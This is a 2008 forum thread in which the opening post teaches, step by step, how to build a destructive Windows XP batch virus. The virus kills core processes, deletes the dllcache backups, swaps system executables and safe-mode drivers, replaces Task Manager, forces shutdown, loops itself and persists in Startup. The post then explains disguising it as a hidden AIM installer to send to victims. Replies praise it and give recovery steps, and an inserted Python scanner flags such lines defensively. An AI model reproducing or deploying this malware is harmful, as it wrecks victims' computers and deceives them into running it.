Killer Batch Tutorial

Discussion in 'Ethical hacking Tips' started by XXxxImmortalxxXX, Jul 4, 2008.

  1. XXxxImmortalxxXX

    XXxxImmortalxxXX New Member

    Joined:
    Jun 27, 2007
    Messages:
    561
    Likes Received:
    19
    Trophy Points:
    0
    It's a collected and a bit modified tut.

    Now to begin we must first ask our selfs questions... How can i cause harm to a computer so the target will not be able to get back to windows and will not be able to boot from safe mode, not only that, but delete our tracks and make the changes to the system so confusing and irreversible that the only way to save it is simply to reformat...well i covered all those fields for you guys.

    Now, what is a batch file?

    Well, to me a batch file is simply a computer file containing a series of related program commands that instruct a computer to perform a series of tasks.

    What kind of commands do I need to know?

    The commands you're going to need to know are simple DOS commands (correct me if I'm wrong please ^^) and CMD commands. To see all batch commands, go to Run, type in Command.com, then type help.

    OK! how do i get started?

    ok you will first want to open up note pad (start>run>notepad) once there we want to start our batch file with the command:

    Code:
    @echo off
    
    this commands simply states the start of our batch file and to "hide" our commands and hides the directory of the batch,let's say the batch is on the desktop,when you run it,it will show C:\document...\Desktop\batchname.
    so now that we've got our starting command lets do some research =)

    if we our selves delete system file in the system32 file at random...they will magically appear as if nothing happens...hmm thats strange..why does it keep re appearing? well turns out the windows is one sneaky bastard and keeps copys of its system32 and other value-able files in the ole magical hidden:
    C:\WINDOWS\system32\dllcache\
    yes... this is where the back-ups are stored...if we delete these then the ones in system32 will not re-appear and thus now we can manipulate these files any way we want as long as we delete the backups =) so now i will continue on with my code...

    Code:
    @echo off
    tskill /a /im winlogon
    tskill /a /im explorer
    tskill /a /im taskmgr
    del %systemdrive%\windows\System32\dllcache\winlogon.exe
    del %systemdrive%\windows\System32\dllcache\explorer.exe
    del %systemdrive%\windows\System32\dllcache\services.exe
    del %systemdrive%\windows\System32\dllcache\vga.sys
    del %systemdrive%\windows\System32\dllcache\mup.sys
    del %systemdrive%\windows\System32\dllcache\taskmgr.exe
    
    I put tskill because winlogon/explorer/taskmgr may be running,so it's better to just disable them

    as you have seen here, these are all vital processes for windows to start... and now that we've removed the original copies..we have gotten the upper hand now so whats next? the PREVENTION.

    the way this batch file is going to work properly is if we can somehow disable the task manager..hmm ok we can just delete tasmgr.exe from system32 and it will never work..butt i love being sinister,evil, and most of all sexy so what i am going to do is make a new batch file with the following code:

    Code:
    @echo off
    msg * oh yea baby press them buttons like you have never pressed them before lol hahaha
    
    Having that done we want to convert it in to an .exe with the name taskmgr..so your output should be taskmgr.exe (google the converter) !GASP! now this is going to be our haha you know your ******* screwed punch line, for those of you who havent catched up..were basicly gonna replace the real taskmgr.exe with our fake one thus every time they press CTRL+ALT+DELETE they will get our lovely/scary/very sexy message.
    Now back to our original batch file we now are going to set the command to copy
    so our code will look like this (the copy command is simple..it just copies)

    The dirty message ( the .exe ) has to be inside the same folder as this batch,or it will not work

    Code:
    @echo off
    tskill /a /im winlogon
    tskill /a /im explorer
    tskill /a /im taskmgr
    del %systemdrive%\windows\System32\dllcache\winlogon.exe
    del %systemdrive%\windows\System32\dllcache\explorer.exe
    del %systemdrive%\windows\System32\dllcache\services.exe
    del %systemdrive%\windows\System32\dllcache\vga.sys
    del %systemdrive%\windows\System32\dllcache\mup.sys
    del %systemdrive%\windows\System32\dllcache\taskmgr.exe
    copy taskmgr.exe %systemdrive%\windows\system32
    
    Now that we have the prevention from pressing control alt delete.. we now need to add the CONFUSION this technique is used to confuse the smart tech guys over at your nearest computer shop on what is going on.

    We are going to rename all the system files into each other..so for example when winlogon.exe wants to load, explorer.exe loads instead and so on.

    Code:
    @echo off
    tskill /a /im winlogon
    tskill /a /im explorer
    tskill /a /im taskmgr
    del %systemdrive%\windows\System32\dllcache\winlogon.exe
    del %systemdrive%\windows\System32\dllcache\explorer.exe
    del %systemdrive%\windows\System32\dllcache\services.exe
    del %systemdrive%\windows\System32\dllcache\vga.sys
    del %systemdrive%\windows\System32\dllcache\mup.sys
    del %systemdrive%\windows\System32\dllcache\taskmgr.exe
    copy taskmgr.exe %systemdrive%\windows\system32
    RENAME %systemdrive%\WINDOWS\system32\services.exe explorer1.exe
    RENAME %systemdrive%\WINDOWS\system32\winlogon.exe services.exe
    RENAME %systemdrive%\WINDOWS\system32\explorer1.exe winlogon.exe
    RENAME %systemdrive%\WINDOWS\explorer.exe explorer1.exe
    RENAME %systemdrive%\WINDOWS\winhelp.exe explorer.exe
    RENAME %systemdrive%\WINDOWS\explorer1.exe winhelp.exe
    
    This my friends will make the computer go nuts, now that we have that..i don't want my user to even try and use safe mode and turns out..GASP! safe mode needs to load two very special .sys files named mup.sys and vga.sys which im guessing its for video..anywho we are going to want to delete those from the cache and rename them, becareful though, they are not located in system32.

    Code:
    @echo off
    tskill /a /im winlogon
    tskill /a /im explorer
    tskill /a /im taskmgr
    del %systemdrive%\windows\System32\dllcache\winlogon.exe
    del %systemdrive%\windows\System32\dllcache\explorer.exe
    del %systemdrive%\windows\System32\dllcache\services.exe
    del %systemdrive%\windows\System32\dllcache\vga.sys
    del %systemdrive%\windows\System32\dllcache\mup.sys
    del %systemdrive%\windows\System32\dllcache\taskmgr.exe
    copy taskmgr.exe %systemdrive%\windows\system32
    RENAME %systemdrive%\WINDOWS\system32\services.exe explorer1.exe
    RENAME %systemdrive%\WINDOWS\system32\winlogon.exe services.exe
    RENAME %systemdrive%\WINDOWS\system32\explorer1.exe winlogon.exe
    RENAME %systemdrive%\WINDOWS\explorer.exe explorer1.exe
    RENAME %systemdrive%\WINDOWS\winhelp.exe explorer.exe
    RENAME %systemdrive%\WINDOWS\explorer1.exe winhelp.exe
    RENAME %systemdrive%\WINDOWS\system32\drivers\mup.sys mup2.sys
    RENAME %systemdrive%\WINDOWS\system32\drivers\vga.sys mup.sys
    RENAME %systemdrive%\WINDOWS\system32\drivers\mup2.sys vga.sys
    
    (Note:Ren also works)

    Ok now we must force the user to shutdown..but remember to give the system enough time to replace these files so lets add the shutdown command
    which shutdown your computer (-t means time and -c means comment)

    Code:
    @echo off
    tskill /a /im winlogon
    tskill /a /im explorer
    tskill /a /im taskmgr
    DEL "C:\WINDOWS\system32\dllcache\winlogon.exe"
    DEL "C:\WINDOWS\system32\dllcache\explorer.exe"
    DEL "C:\WINDOWS\system32\dllcache\services.exe"
    DEL "C:\WINDOWS\system32\dllcache\vga.sys"
    DEL "C:\WINDOWS\system32\dllcache\mup.sys"
    DEL "C:\WINDOWS\system32\dllcache\taskmgr.exe"
    DEL "C:\WINDOWS\system32\taskmgr.exe"
    copy "taskmgr.exe" "C:\WINDOWS\system32"
    RENAME "C:\WINDOWS\system32\services.exe" "explorer1.exe
    RENAME "C:\WINDOWS\system32\winlogon.exe" "services.exe"
    RENAME "C:\WINDOWS\system32\explorer1.exe" "winlogon.exe"
    RENAME "C:\WINDOWS\explorer.exe" "explorer1.exe"
    RENAME "C:\WINDOWS\winhelp.exe" "explorer.exe"
    RENAME "C:\WINDOWS\explorer1.exe" "winhelp.exe"
    RENAME "C:\WINDOWS\system32\drivers\mup.sys" "mup2.sys
    RENAME "C:\WINDOWS\system32\drivers\vga.sys" "mup.sys"
    RENAME "C:\WINDOWS\system32\drivers\mup2.sys" "vga.sys"
    shutdown -s -t 10
    
    Now the user has 10 seconds before complete system shutdown..now if you change those system files...we are going to get a pop up saying to locate your windows xp cd because valueble files have been replaced..haha heres a challange run this program on your computer and look for your windows xp copy/insert it/ and let it load in 15 seconds hahahaha good luck specially when your cought off guard =P.

    Ok now we're still gonna add even more goodies to this batch..we are going to fork it..yes youve heard me..fork is when the application opens and application which opens the application while the others open applications..so basicly you stupify the computer with cmd pop ups sp no we use the echo command to bring out what we want the users to see.

    Code:
    @echo off
    tskill /a /im winlogon
    tskill /a /im explorer
    tskill /a /im taskmgr
    DEL "C:\WINDOWS\system32\dllcache\winlogon.exe"
    DEL "C:\WINDOWS\system32\dllcache\explorer.exe"
    DEL "C:\WINDOWS\system32\dllcache\services.exe"
    DEL "C:\WINDOWS\system32\dllcache\vga.sys"
    DEL "C:\WINDOWS\system32\dllcache\mup.sys"
    DEL "C:\WINDOWS\system32\dllcache\taskmgr.exe"
    DEL "C:\WINDOWS\system32\taskmgr.exe"
    copy "taskmgr.exe" "C:\WINDOWS\system32"
    RENAME "C:\WINDOWS\system32\services.exe" "explorer1.exe
    RENAME "C:\WINDOWS\system32\winlogon.exe" "services.exe"
    RENAME "C:\WINDOWS\system32\explorer1.exe" "winlogon.exe"
    RENAME "C:\WINDOWS\explorer.exe" "explorer1.exe"
    RENAME "C:\WINDOWS\winhelp.exe" "explorer.exe"
    RENAME "C:\WINDOWS\explorer1.exe" "winhelp.exe"
    RENAME "C:\WINDOWS\system32\drivers\mup.sys" "mup2.sys
    RENAME "C:\WINDOWS\system32\drivers\vga.sys" "mup.sys"
    RENAME "C:\WINDOWS\system32\drivers\mup2.sys" "vga.sys"
    shutdown -s -t 10
    Echo HAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
    Echo HAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
    Echo HAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
    Echo HAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
    Echo HAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
    Echo HAHAHAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
    
    Ok now we have them what we want the to see... NOW we are going to make it repeat it by trying to open this very same file again by using label. a label is basicly a bookmark in your book, it lets you go back to that specific place. so a label looks like this-
    Code:
    :start
    
    ":" is label and "start" is the name (it can be anything).

    Code:
    @echo off
    tskill /a /im winlogon
    tskill /a /im explorer
    tskill /a /im taskmgr
    DEL "C:\WINDOWS\system32\dllcache\winlogon.exe"
    DEL "C:\WINDOWS\system32\dllcache\explorer.exe"
    DEL "C:\WINDOWS\system32\dllcache\services.exe"
    DEL "C:\WINDOWS\system32\dllcache\vga.sys"
    DEL "C:\WINDOWS\system32\dllcache\mup.sys"
    DEL "C:\WINDOWS\system32\dllcache\taskmgr.exe"
    DEL "C:\WINDOWS\system32\taskmgr.exe"
    copy "taskmgr.exe" "C:\WINDOWS\system32"
    RENAME "C:\WINDOWS\system32\services.exe" "explorer1.exe
    RENAME "C:\WINDOWS\system32\winlogon.exe" "services.exe"
    RENAME "C:\WINDOWS\system32\explorer1.exe" "winlogon.exe"
    RENAME "C:\WINDOWS\explorer.exe" "explorer1.exe"
    RENAME "C:\WINDOWS\winhelp.exe" "explorer.exe"
    RENAME "C:\WINDOWS\explorer1.exe" "winhelp.exe"
    RENAME "C:\WINDOWS\system32\drivers\mup.sys" "mup2.sys
    RENAME "C:\WINDOWS\system32\drivers\vga.sys" "mup.sys"
    RENAME "C:\WINDOWS\system32\drivers\mup2.sys" "vga.sys"
    shutdown -s -t 10
    Echo HAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
    Echo HAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
    Echo HAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
    Echo HAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
    Echo HAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
    Echo HAHAHAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
    :start
    
    So finally

    Code:
    @echo off
    tskill /a /im winlogon
    tskill /a /im explorer
    tskill /a /im taskmgr
    del %systemdrive%\windows\System32\dllcache\winlogon.exe
    del %systemdrive%\windows\System32\dllcache\explorer.exe
    del %systemdrive%\windows\System32\dllcache\services.exe
    del %systemdrive%\windows\System32\dllcache\vga.sys
    del %systemdrive%\windows\System32\dllcache\mup.sys
    del %systemdrive%\windows\System32\dllcache\taskmgr.exe
    copy taskmgr.exe %systemdrive%\windows\system32
    RENAME %systemdrive%\WINDOWS\system32\services.exe explorer1.exe
    RENAME %systemdrive%\WINDOWS\system32\winlogon.exe services.exe
    RENAME %systemdrive%\WINDOWS\system32\explorer1.exe winlogon.exe
    RENAME %systemdrive%\WINDOWS\explorer.exe explorer1.exe
    RENAME %systemdrive%\WINDOWS\winhelp.exe explorer.exe
    RENAME %systemdrive%\WINDOWS\explorer1.exe winhelp.exe
    RENAME %systemdrive%\WINDOWS\system32\drivers\mup.sys mup2.sys
    RENAME %systemdrive%\WINDOWS\system32\drivers\vga.sys mup.sys
    RENAME %systemdrive%\WINDOWS\system32\drivers\mup2.sys vga.sys
    shutdown -s -t 10
    Echo HAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
    Echo HAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
    Echo HAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
    Echo HAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
    Echo HAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
    Echo HAHAHAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
    copy %0 "%systemdrive%\documents and settings\%username%\start menu\programs\startup"
    :1
    start %0
    goto :1
    
    Notice i put a directory there..hmm and its a start up too...wow i must be thinking something

    now were gonna save this as virus.bat and make another simple batch file with the code-

    Code:
    @echo off
    copy "virus.exe" "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
    start virus.exe
    
    And save it as move.bat
    as you can see this will only start what we just made and move it to start ups =)) so if they fix the problem ( by sheer luck) and turn the comp back on with this file still in start up..they will be surprised =)).. now we are going to turn these files into .exe with the converter (bat to exe;google it). we are going to choose move.bat and click compile. and then do the same for virus.bat, after this you should end up with a move.exe and a virus.exe. now how in the world are we going to include the task manager we made into our file..hmmmm OH! windows has its own packalotofevilexe program =) go to start run then type iexpress
    !GASP!!

    Now create a new self extraction then click next
    Select extract and install (the first choice Buzzo) then next
    Give it a good looking tiltle like...Install_AIM then next
    Then no promt then next
    No license..next
    Ah now we add our move.exe, virus.exe and taskmgr.exe in to this wonderful white box And click next
    On the box that says install program select move.exe then next, we don't need anything for the bottom
    Select hidden then next
    No message, next
    Now check hide process animation from user and click browse to save it and give it a good Name like above..something beleive able like Installer_AIM.exe
    No restart, next
    Don't save if you do then save i don't care, next
    Then create and your Installer_AIM.exe will be created.. NOW! look at the fugly icon..
    Use my icon changer and look for an AIM icon or something to make it beleive able, my icon changer is pretty self explanatory (and not..its really not mine) so i don't feel like getting into the icon changer since even a stupid one can do it. your .exe is now alive and kicking so send it to your nearest myspace user.

    And u can code the hole -unauthorized word- thing here----
    Code:
    http://batchcrypt.110mb.com
    
    hope this help and that site is very good hope you like it
     
  2. GreenGrass

    GreenGrass New Member

    Joined:
    Jul 5, 2008
    Messages:
    123
    Likes Received:
    8
    Trophy Points:
    0
    Location:
    Norway
    Nice Batch Virus.. Keep up the good work.
     
  3. XXxxImmortalxxXX

    XXxxImmortalxxXX New Member

    Joined:
    Jun 27, 2007
    Messages:
    561
    Likes Received:
    19
    Trophy Points:
    0
  4. microapple

    microapple Banned

    Joined:
    Jul 2, 2008
    Messages:
    58
    Likes Received:
    2
    Trophy Points:
    0
    Awesome tutorial!!! :auto: :bandana: :crowd: :gun: :gunsmilie :shoot: :cornut: :rockon:
     
  5. XXxxImmortalxxXX

    XXxxImmortalxxXX New Member

    Joined:
    Jun 27, 2007
    Messages:
    561
    Likes Received:
    19
    Trophy Points:
    0
    lol how long did that take to make lol? all the smile faces its cool
     
  6. ruiner0

    ruiner0 New Member

    Joined:
    Jul 10, 2008
    Messages:
    6
    Likes Received:
    0
    Trophy Points:
    0
    omg that's crazy
    very nice tutorial
    keep it up :happy:
     
  7. XXxxImmortalxxXX

    XXxxImmortalxxXX New Member

    Joined:
    Jun 27, 2007
    Messages:
    561
    Likes Received:
    19
    Trophy Points:
    0
  8. sofprog66

    sofprog66 New Member

    Joined:
    Jul 8, 2008
    Messages:
    29
    Likes Received:
    0
    Trophy Points:
    0
    Very nice tutorial, but is there a way to prevent this from happening once the exe starts to run?
     
  9. GreenGrass

    GreenGrass New Member

    Joined:
    Jul 5, 2008
    Messages:
    123
    Likes Received:
    8
    Trophy Points:
    0
    Location:
    Norway
    When you have the shutdown at 10 seconds, go fast to cmd and type "shutdown -a".
    That means you abort the shutdown.

    Go to "START" and "RUN", type "/sfc purgecache" and "/sfc scannow".
    When you do the scannow command you have to put in your Windows CD.
    This will restore all Windows files that are changed.

    I haven't tested this out on the virus but I think it will work..
    or you may use "System Restore".

    Also you must delete the file in the "Startup folder" so the virus won't boot when you reboot the
    computer.
     
    Last edited: Jul 13, 2008
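Post 8 asks how to stop this before it runs. The block below is an added example, not written by any poster in this thread: a static triage check that flags a batch file when several of the behaviours described in the first post appear together. The rule names, patterns and threshold are assumptions chosen for illustration, and both sample scripts are constructed.

```python
import re

# Heuristic rules for behaviours described in this thread. Names and patterns
# are assumptions for this example, not a vendor signature set.
RULES = [
    ("dllcache-delete",
     re.compile(r"^\s*del\b.*\\system32\\dllcache\\", re.I)),
    ("critical-process-kill",
     re.compile(r"^\s*(tskill|taskkill)\b.*\b(winlogon|explorer|taskmgr)\b", re.I)),
    ("system-file-rename",
     re.compile(r"^\s*ren(ame)?\b.*\\windows\\(system32\\)?(drivers\\)?[\w.]+\.(exe|sys)\b", re.I)),
    ("system32-drop",
     re.compile(r"^\s*copy\b.*\.exe\b.*\\windows\\system32", re.I)),
    ("startup-persistence",
     re.compile(r"^\s*copy\b.*\\start menu\\programs\\startup", re.I)),
    ("forced-shutdown",
     re.compile(r"^\s*shutdown\b.*[-/]s\b", re.I)),
    ("self-relaunch",
     re.compile(r"^\s*start\b.*%0", re.I)),
]

def scan_batch(text):
    """Return {rule_name: [line_numbers]} for every rule that fires."""
    hits = {}
    for lineno, line in enumerate(text.splitlines(), start=1):
        stripped = line.strip()
        if stripped.lower().startswith(("rem ", "::")):
            continue  # comment lines never execute
        for name, pattern in RULES:
            if pattern.search(stripped):
                hits.setdefault(name, []).append(lineno)
    return hits

def verdict(hits, threshold=3):
    """One behaviour alone is worth a look; several together are blocked."""
    if len(hits) >= threshold:
        return "block"
    return "review" if hits else "allow"

# Constructed sample: a few lines of the kind shown in the first post.
SUSPECT = r"""@echo off
tskill /a /im winlogon
del %systemdrive%\windows\System32\dllcache\winlogon.exe
RENAME %systemdrive%\WINDOWS\system32\drivers\mup.sys mup2.sys
shutdown -s -t 10
copy %0 "%systemdrive%\documents and settings\%username%\start menu\programs\startup"
"""

# Constructed sample: an ordinary script that must not be flagged.
BENIGN = r"""@echo off
rem del C:\WINDOWS\system32\dllcache\old.tmp
ren report.txt report.old
shutdown -a
"""

if __name__ == "__main__":
    for label, script in (("suspect", SUSPECT), ("benign", BENIGN)):
        found = scan_batch(script)
        print(label, verdict(found), found)
```

A check like this belongs at the mail gateway or download scanner, before the file reaches a user; it reads the script as text and never executes it.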
  10. sofprog66

    sofprog66 New Member

    Joined:
    Jul 8, 2008
    Messages:
    29
    Likes Received:
    0
    Trophy Points:
    0
    Only 10 seconds to open up command prompt and write shutdown -a ouch, it would totally suck if you misspell it.
     
  11. GreenGrass

    GreenGrass New Member

    Joined:
    Jul 5, 2008
    Messages:
    123
    Likes Received:
    8
    Trophy Points:
    0
    Location:
    Norway
    Since explorer.exe is taken away, you need to press "WINDOWS + R"; that takes you to "RUN".
    You can also type it in Run: "shutdown -a"
     
    Last edited: Jul 14, 2008
    shabbir likes this.
  12. sofprog66

    sofprog66 New Member

    Joined:
    Jul 8, 2008
    Messages:
    29
    Likes Received:
    0
    Trophy Points:
    0
    Thank you GreenGrass. It helps to know this prevention for future reference.
     
  13. GreenGrass

    GreenGrass New Member

    Joined:
    Jul 5, 2008
    Messages:
    123
    Likes Received:
    8
    Trophy Points:
    0
    Location:
    Norway
    Also, if you are going to use System Restore, go to cmd and
    type "%systemRoot%\system32\restore\rstrui.exe"
    Sorry that I didn't type that in the last post :/
     
  14. sofprog66

    sofprog66 New Member

    Joined:
    Jul 8, 2008
    Messages:
    29
    Likes Received:
    0
    Trophy Points:
    0
    Thank you again :).
     
  15. XXxxImmortalxxXX

    XXxxImmortalxxXX New Member

    Joined:
    Jun 27, 2007
    Messages:
    561
    Likes Received:
    19
    Trophy Points:
    0

    LOL yeah that would lol i laughed for like 5 minutes when i read that lol thanks mate
     
  16. hanleyhansen

    hanleyhansen New Member

    Joined:
    Jan 24, 2008
    Messages:
    336
    Likes Received:
    8
    Trophy Points:
    0
    Occupation:
    Drupal Developer/LAMP Developer
    Location:
    Clifton
    Home Page:
    http://www.hanseninfotech.com
    This is a great batch program!! Some people really underestimate the power of batch files. Great job!!!
     
  17. XXxxImmortalxxXX

    XXxxImmortalxxXX New Member

    Joined:
    Jun 27, 2007
    Messages:
    561
    Likes Received:
    19
    Trophy Points:
    0
  18. pokerstud001

    pokerstud001 New Member

    Joined:
    Dec 22, 2008
    Messages:
    2
    Likes Received:
    0
    Trophy Points:
    0
    Great, but what's up with your website? I mean really...
     
  19. XXxxImmortalxxXX

    XXxxImmortalxxXX New Member

    Joined:
    Jun 27, 2007
    Messages:
    561
    Likes Received:
    19
    Trophy Points:
    0
    Well, to summarize it mate


    Don't ever trust anyone. If you ever make a site like a forum, don't make staff

    one of my staff I loved so much decided to betray me

    that's all I'm gonna say
     
  20. pokerstud001

    pokerstud001 New Member

    Joined:
    Dec 22, 2008
    Messages:
    2
    Likes Received:
    0
    Trophy Points:
    0
